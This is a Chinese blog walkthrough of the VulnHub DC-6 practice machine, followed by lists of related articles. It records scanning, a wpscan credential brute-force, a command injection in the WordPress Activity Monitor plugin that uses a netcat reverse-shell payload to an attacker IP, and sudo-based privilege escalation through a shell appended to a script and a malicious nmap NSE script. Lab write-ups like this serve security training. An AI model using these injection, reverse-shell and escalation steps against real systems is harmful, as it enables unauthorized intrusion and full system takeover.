DC-6靶机

最新推荐文章于 2024-12-19 14:46:21 发布
最新推荐文章于 2024-12-19 14:46:21 发布
阅读量452 收藏 8
点赞数 5
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/zdd1453691081/article/details/141172732
版权

信息收集:

靶机地址:https://download.vulnhub.com/dc/DC-6.zip

(1)ip扫描

nmap 192.168.254.0/24 -sn | grep -B 2 '00:0C:29:6C:F9:9D'

(2)端口扫描

nmap 192.168.254.155 -p- -A

(3)目录扫描

dirsearch  -u http://192.168.254.155

(4)访问80端口,无法访问,需要修改dns文件,在hosts文件中添加

192.168.254.155 wordy

(5)添加以下内容后再次访问,得到如下页面,提示是wordpress

(6)用whatweb查看一下具体信息

whatweb -v http://192.168.254.155

(7)可知是word press和apache搭建的网站,用wpscan来扫描一下用户

wpscan --url http://wordy/ --enumerate u

发现以下用户,将其保存下来,以便后续爆破
admin graham mark sarah jens

(8)官网提示

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

(9)爆破账号密码

wpscan --url http://wordy/ -U usernames.txt -P passwords.txt
 
mark:helpdesk01

(10)登录后台

http://wordy/wp-admin/

(11)侧边栏里面有个activity monitor插件, 去漏洞库搜一下这个插件是否有漏洞

WordPress Plugin Plainview Activity Monitor 20161228 - (Authenticated) Command Injection - PHP webapps Exploit

getshell:

(1)漏洞利用地址

http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools

(2)命令注入,打开bp进行抓包,在ip那一栏填上一个网址,点击lookup

(3)拼接如下命令

baidu.com | nc -e /bin/bash 192.168.254.129 4444

(4)kali监听

nc -lvvp 4444

(5)反弹到了

(6)python开启交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

(7)在以下目录中,发现提示信息

cd /home/mark/stuff

(8)ssh登录

graham:GSo7isUM1D4
 
ssh graham@192.168.254.155

(9)如果出现以下情况,移除旧的密钥,重新连接

移除旧的密钥
ssh-keygen -f "/root/.ssh/known_hosts" -R "192.168.254.155"

重新连接
ssh graham@192.168.254.155

提权:

(1)查看当前用户可执行的操作

sudo -l

(2)发现可操作/home/jens/backups.sh,打开发现是一个解压的脚本

cat /home/jens/backups.sh

(3)向这个脚本写入命令,让jens这个用户来执行

echo "/bin/bash" >> /home/jens/backups.sh
sudo -u jens /home/jens/backups.sh

(4)已经切换到jens用户,查看这个用户可以执行的命令

(5)看到一个nmap,需要nmap打开一个shell即可获得root权限

nmap中执行shell方法
echo "os.execute('/bin/bash')">/tmp/shell.nse
sudo nmap --script=/tmp/shell.nse

(6)至此成功提权,当前shell不显示命令,需要盲打

查看flag
cd /root
cat theflag.txt

DC-6靶机渗透测试
m0_66225311的博客
08-05 635
又是一个远古靶机,最近又做了一做,发现可以直接用50110.py文件一把梭获取权限,不需要之前那么繁琐的用html文件来反弹shell了。第一次没能进行尝试,要不然就能搞点不一样的了
DC-6靶机进行渗透测试
zll___的博客
03-20 1046
DC-6靶机进行渗透测试
sngrep 检测工具
04-22
sngrep是一款sip信令检测工具
sip信令跟踪工具sngrep
求真得真的博客
10-27 2017
概述 在VOIP的使用过程中,最常见的问题就是信令不通和语音质量问题。 通常的问题跟踪手段包括日志分析、抓包分析。 抓包的工具有wireshark、tcpdump等等,如果是只针对sip信令的抓包,则sngrep更专业好用。 sngrep对SIP抓包的专业性体现在: 实时抓取,实时展示。 可以作为sip PCAP查看器。 对sip信令中的任意字段设置过滤器。 对一个dialog的sip信令自动关联。 环境 centos6,centos7 安装 依赖库 yum in...
Kamailio-Sngrep 短小精悍的利器
c_zyer的博客
10-18 1255
一个sip的抓包小工具,在GitHub上竟然能够积累1K的star,看来还是有点东西,当然官方的友链也是发挥了重要作用首先,有能力的宝子可以自行查看但是对于本章要讲的SIP信令的抓包,也就是Wireshark、tcpdump,以及前面讲到过较为系统的Homer,如果嫌弃Wireshark笨重、tcpdump原始,那么就一起来看看这款短小精悍的sngrep。官方自己定义:是一款可以在命令行终端展示SIP电话消息流的工具,它能够支持实时的抓取并展现SIP包,也可以用来做一个pcap的阅读器。
sngrep安装教程
weixin_44420477的博客
02-11 1598
sngrep 工具 ----------------------呼叫中心 http://www.github.com/irontec/sngrep 开源地址 安装依赖 yum install -y ncurses-devel make libpcap-devel pcre-devel openssl-devel git gcc autoconf automake cd /usr git clone https://github.com/irontec/sngrep cd sngrep ./bootstrap
sngrep
hanyingzhong的专栏
11-11 4095
sngrep Since March 2017 Sngrep is installed on all systems by default. This is a very useful tool to help troubleshoot all types of sip related issues. If you installed FusionPBX prior to March 2017...
渗透DC-6靶机
C-HOWE的博客
12-19 895
本篇文章旨在为网络安全渗透测试行业靶机教学。通过阅读本文,读者将能够对渗透DC-6靶机有一个初步的了解。
DC-6靶机通关
qq_63831588的博客
07-29 2729
做完感觉这个靶机还是很有意思的,并且它其实不难,但是这个思路真的很有意思。首先他的关键点在于让我们通过wp插件的漏洞去拿到webshell其次就是普通用户间的博弈,以往我们都是通过账号密码看来进行切换,而这次是通过sudo普通用户来切换然后最后的提权还是用的sudo,确实也听巧妙的,这次我愿称之为将 sudo 进行到底!!!~~~~~持续更新中。
DC-6靶机渗透学习记录
tyut_dummy的博客
07-16 1515
7.用bp抓包一下,在bp中输入baidu.com | nc -e /bin/sh 192.168.6.137 7878进行反弹shell,同时在kali中监听7878端口。6.在ID or integer的输入框中输入一个网站地址,如:baidu.com,然后点击Lookup,发现有回显。`--detection-mode`:设置扫描的侦测模式,如快速、默认或深度。例如:nmap,WPscan,burpsuite,dirb等等。得到admin,mark,graham,sarah,jens几个用户名。
DC-4靶机提权超详细过程
02-29
### DC-4靶机提权超详细过程 #### 一、前言 本文将详细介绍如何在DC-4靶机上进行权限提升的过程,包括利用Kali Linux进行初始渗透测试、爆破登录凭证、获取敏感信息以及最终实现权限提升的具体步骤。通过本教程,...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
DC-6靶机做题记录
Fab1an的博客
01-21 1510
hosts文件域名解析对WordPress的了解程度,比如后台是wp-admin,还有一个readme.htmlWordPress的扫描器叫wpscan,以及wpscan的用法,可以百度要会爆破它的用户名和密码,可以用BurpSuite或者wpscan去爆破,也可以用hydra或者其他的一些方式进入后台找寻一个能写php代码的地方,把shell弹回来找到一个插件的漏洞,然后用它来反弹shellnamp提权,用nse脚本提权。
【vulnhub】---DC-6靶机
qq_43168364的博客
08-21 792
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机靶机(192.168.15.154) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:netdiscover -i eth0 -r 192.168.15.0/24 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8713
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
卷积神经网络,本项目是根据CNN理论思想,使用C#编码的项目,为使用C#人员,更快速的清晰的理解,CNN的底层计算过程从而了解卷积思想。.zip
06-08
卷积神经网络(Convolutional Neural Networks, CNN),本项目是根据CNN理论思想,使用C#编码的项目,为使用C#人员,更快速的清晰的理解,CNN的底层计算过程从而了解卷积思想。
【模板】日语模板_ANKI牌组_卡片_备考记忆.apkg
06-08
【模板】日语模板_ANKI牌组_卡片_备考记忆.apkg
AI生成美女图片带货项目玩法教程:电商领域实操与变现策略拆解
最新发布
06-08
AI生成美女图片带货项目玩法教程:电商领域实操与变现策略拆解
DC-1靶机渗透测试攻略及DC-2靶机简介
DC-1靶机是Vulnhub提供的众多靶机之一,专门设计用于学习和练习渗透测试技术。 DC-1靶机描述中提到的渗透测试,是指一种旨在评估计算机系统安全性的方法,通过尝试攻击系统来找到安全弱点。渗透测试人员(俗称“白...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值